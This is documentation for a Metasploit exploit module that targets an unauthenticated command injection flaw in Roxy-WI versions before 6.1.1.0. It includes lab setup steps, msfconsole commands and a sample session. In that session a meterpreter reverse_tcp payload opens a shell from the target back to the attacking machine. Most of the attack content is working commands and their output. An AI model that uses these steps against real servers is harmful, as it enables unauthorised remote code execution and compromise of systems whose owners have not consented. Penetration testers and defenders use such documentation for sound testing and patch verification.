Nuri Çilengir
2.1 KiB
2.1 KiB
Vulnerable Application
This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0. Successful exploitation results in remote code execution under the context of the web server user.
Setup
Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages.
https://roxy-wi.org/installation.py#manual
git clone https://github.com/hap-wi/roxy-wi.git /var/www/haproxy-wi
chmod +x haproxy-wi/app/*.py
sudo ./haproxy-wi/app/create_db.py
chown -R www-data:www-data haproxy-wi
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/linux/http/roxy_wi_exec - Set
RHOSTto the address of the target Roxy-WI machine. - Set
LHOSTto the address of your attacking machine. - Run
exploit - Do:
run - You should get a shell as the user running the Roxy-WI server.
Targets
0
This executes a Unix command.
1
This uses a Linux dropper to execute code.
Options
TARGETURI
Set TARGETURI if the Roxy-WI is installed at a custom path.
Scenarios
Roxy-WI 6.1.1.0 Ubuntu 20.04 GNU/Linux (x86_64)
Apache/2.4.52
MySQL 8.0.29
Python 3.10.4
msf6 > use exploit/linux/http/roxy_wi_exec
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
[*] Executing Automatic for cmd/unix/python/meterpreter/reverse_tcp
[*] Sending stage (40168 bytes) to 192.168.56.116
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:56156) at 2022-07-25 18:49:54 +0300
meterpreter >